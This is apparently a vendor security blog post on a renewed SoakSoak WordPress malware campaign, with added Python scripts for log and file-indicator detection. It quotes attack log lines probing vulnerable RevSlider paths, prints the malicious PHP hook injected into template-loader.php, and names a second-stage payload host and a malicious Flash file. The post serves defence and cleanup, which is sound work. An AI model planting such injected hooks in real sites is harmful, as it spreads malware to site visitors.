SoakSoak Campaign Evolves – New Wave of Attacks


Since Sunday, we have seen a new wave of SoakSoak reinfections. The Javascript continues to evolve and load other scripts in order to infect additional websites. We have updates for concerned webmasters looking to stay on top of the threat and keep their site protected against these kinds of attacks.

To those websites that have ignored, or have otherwise not been made aware of, our advice to update the RevSlider plugin: we are seeing server logs showing attempts to locate and infect old versions of RevSlider (<4.2):

[21/Dec/2014:09:48:14 -0500] "POST /wp-content/plugins/revslider/temp/update_extract/revslider/license.php HTTP/1.1" 200 357 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"

[21/Dec/2014:09:48:15 -0500] "POST /wp-content/plugins/revslider/temp/update_extract/revslider/__sprd.php HTTP/1.1" 200 474 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"
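The two log lines above are what a webmaster should be grepping for. The following Python script is an added example (not part of the original post or of Sucuri's tooling) that parses combined-format access log lines and flags any request to the RevSlider temp/update_extract directory, rating a 2xx answer higher than a 404 because a 200 means the probed file exists and executed. The sample log is constructed here from the two lines in the post plus a failed probe and a benign request.

```python
import re
from typing import Dict, List, Optional

# Apache/nginx "combined" format as shown in the post:
#   [time] "METHOD path HTTP/x.y" status bytes "referer" "user-agent"
# search() is used so lines with or without a leading client IP both parse.
LOG_RE = re.compile(
    r'\[(?P<time>[^\]]+)\]\s+"(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+HTTP/[\d.]+"\s+'
    r'(?P<status>\d{3})\s+(?P<size>\d+|-)\s+"(?P<referer>[^"]*)"\s+"(?P<ua>[^"]*)"'
)

# The directory the campaign is probing: files dropped under RevSlider's
# update_extract temp path (where old plugin versions allowed file writes).
REVSLIDER_TEMP = re.compile(r"/wp-content/plugins/revslider/temp/update_extract/", re.I)

# Constructed sample: lines 1-2 are from the post, 3 is a failed probe, 4 is benign.
SAMPLE_LOG = [
    '[21/Dec/2014:09:48:14 -0500] "POST /wp-content/plugins/revslider/temp/update_extract/revslider/license.php HTTP/1.1" 200 357 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"',
    '[21/Dec/2014:09:48:15 -0500] "POST /wp-content/plugins/revslider/temp/update_extract/revslider/__sprd.php HTTP/1.1" 200 474 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"',
    '203.0.113.5 - - [21/Dec/2014:09:48:20 -0500] "POST /wp-content/plugins/revslider/temp/update_extract/revslider/license.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"',
    '[21/Dec/2014:09:50:01 -0500] "GET /wp-content/plugins/revslider/rs-plugin/css/settings.css HTTP/1.1" 200 3321 "-" "Mozilla/5.0"',
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.search(line)
    return m.groupdict() if m else None


def classify_revslider_hits(lines: List[str]) -> List[Dict[str, str]]:
    """One record per request touching the RevSlider temp directory.

    severity "high": server answered 2xx, so the dropped file is present and ran.
    severity "probe": any other status (typically 404), the file is not there
    but someone is looking for it; still worth correlating with other hosts.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec or not REVSLIDER_TEMP.search(rec["path"]):
            continue
        status = int(rec["status"])
        rec["severity"] = "high" if 200 <= status < 300 else "probe"
        hits.append(rec)
    return hits


def summarize(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count hits per severity so a daily report can be produced from a whole log."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h["severity"]] = counts.get(h["severity"], 0) + 1
    return counts


if __name__ == "__main__":
    # Replace SAMPLE_LOG with open("/var/log/apache2/access.log") for a real run.
    for h in classify_revslider_hits(SAMPLE_LOG):
        print(h["severity"], h["time"], h["method"], h["path"], h["status"])
    print(summarize(classify_revslider_hits(SAMPLE_LOG)))
```

Any "high" hit means the temp directory already contains attacker-controlled PHP and the site should be treated as compromised rather than merely scanned; a "probe" alone still shows the host is on the campaign's target list and the plugin version should be checked.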

This time the malware authors changed the Javascript file that they inject the malicious code into. Now it’s wp-includes/js/json2.min.js. The corresponding code in wp-includes/template-loader.php has changed as well:

// Injected into wp-includes/template-loader.php: registers the trojanized
// 'json2' script handle so the malicious file is loaded on every front-end page.
function Func11()
{
    wp_enqueue_script('json2');
}
add_action('wp_enqueue_scripts', 'Func11');

The malicious code in wp-includes/js/json2.min.js still loads the wp-includes/js/swfobjct.swf Flash file (100% malicious; see our full payload analysis), but the code is now more elaborate. Here you can see the decoded version:

[Image: decoded malware in json2.min.js]

The hidden iFrame URL in swfobjct.swf now depends on another script from hxxp://ads .akeemdom . com/db26, also loaded by malware in json2.min.js.
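To check a WordPress install for the two injection points described above (the hook added to wp-includes/template-loader.php and the Flash loader added to wp-includes/js/json2.min.js), here is an added Python script that is not part of the original post or of Sucuri's products. It relies on the assumption, used as a heuristic, that core template-loader.php declares no functions and registers no hooks, that core json2.min.js never references a .swf or an iframe, and that no .swf belongs under wp-includes/js; the indicator strings come from the post and the sample file contents are constructed, with the domain kept defanged.

```python
import os
import re
from typing import Dict, List

# Per-file indicators. Keys are paths relative to the WordPress root.
INDICATORS: Dict[str, List[re.Pattern]] = {
    "wp-includes/template-loader.php": [
        # Heuristic (assumption): core template-loader.php has no add_action,
        # no wp_enqueue_script and no function definitions of its own.
        re.compile(r"add_action\s*\(\s*['\"]wp_enqueue_scripts['\"]", re.I),
        re.compile(r"wp_enqueue_script\s*\(", re.I),
        re.compile(r"\bfunction\s+\w+\s*\(", re.I),
    ],
    "wp-includes/js/json2.min.js": [
        re.compile(r"swfobjct\.swf", re.I),   # Flash payload named in the post
        re.compile(r"akeemdom", re.I),        # second-stage domain named in the post
        re.compile(r"\.swf\b", re.I),         # a JSON polyfill has no business loading Flash
        re.compile(r"<iframe", re.I),
    ],
}
# Any .swf under wp-includes/js is unexpected in a stock install.
SWF_IN_JS = re.compile(r"^wp-includes/js/.*\.swf$", re.I)

# Constructed samples: an infected tree (post's injected code, defanged domain)
# and a clean one (core-like fragments).
INFECTED = {
    "wp-includes/template-loader.php": "<?php\nfunction Func11()\n{\nwp_enqueue_script('json2');\n}\nadd_action('wp_enqueue_scripts', 'Func11');\n",
    "wp-includes/js/json2.min.js": 'if(!this.JSON){this.JSON={};}var f=document.createElement("object");f.data="/wp-includes/js/swfobjct.swf";var s=document.createElement("script");s.src="hxxp://ads[.]akeemdom[.]com/db26";',
    "wp-includes/js/swfobjct.swf": "",
}
CLEAN = {
    "wp-includes/template-loader.php": "<?php\nif ( defined('WP_USE_THEMES') && WP_USE_THEMES )\n\tdo_action( 'template_redirect' );\n",
    "wp-includes/js/json2.min.js": "if(!this.JSON){this.JSON={};}(function(){'use strict';})();",
}


def scan_tree(files: Dict[str, str]) -> List[dict]:
    """Scan a {relative_path: content} mapping and return one finding per matched indicator."""
    findings = []
    for path, content in files.items():
        rel = path.replace(os.sep, "/")
        if SWF_IN_JS.match(rel):
            findings.append({"file": rel, "indicator": "unexpected .swf in wp-includes/js"})
        for pat in INDICATORS.get(rel, []):
            m = pat.search(content)
            if m:
                findings.append({"file": rel, "indicator": m.group(0)})
    return findings


def flagged_files(files: Dict[str, str]) -> set:
    """Just the set of file paths with at least one finding."""
    return {f["file"] for f in scan_tree(files)}


def scan_wordpress_root(root: str) -> List[dict]:
    """Read the watched files from a real install on disk and scan them."""
    files: Dict[str, str] = {}
    for rel in INDICATORS:
        full = os.path.join(root, *rel.split("/"))
        if os.path.isfile(full):
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                files[rel] = fh.read()
    js_dir = os.path.join(root, "wp-includes", "js")
    if os.path.isdir(js_dir):
        for name in os.listdir(js_dir):
            if name.lower().endswith(".swf"):
                files["wp-includes/js/" + name] = ""
    return scan_tree(files)


if __name__ == "__main__":
    for finding in scan_tree(INFECTED):
        print(finding["file"], "->", finding["indicator"])
    # For a live site: scan_wordpress_root("/var/www/html")
```

A hit on either core file means the files should be replaced from a fresh WordPress download of the same version rather than hand-edited, since the post shows the authors changing which core file they target between waves; comparing checksums of all of wp-includes against the official release catches the next variant regardless of the file chosen.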

We will continue to monitor the situation and provide more information from our research labs. Webmasters who are already using our Website Firewall don’t need to worry, as they are protected against this and other zero-day threats.
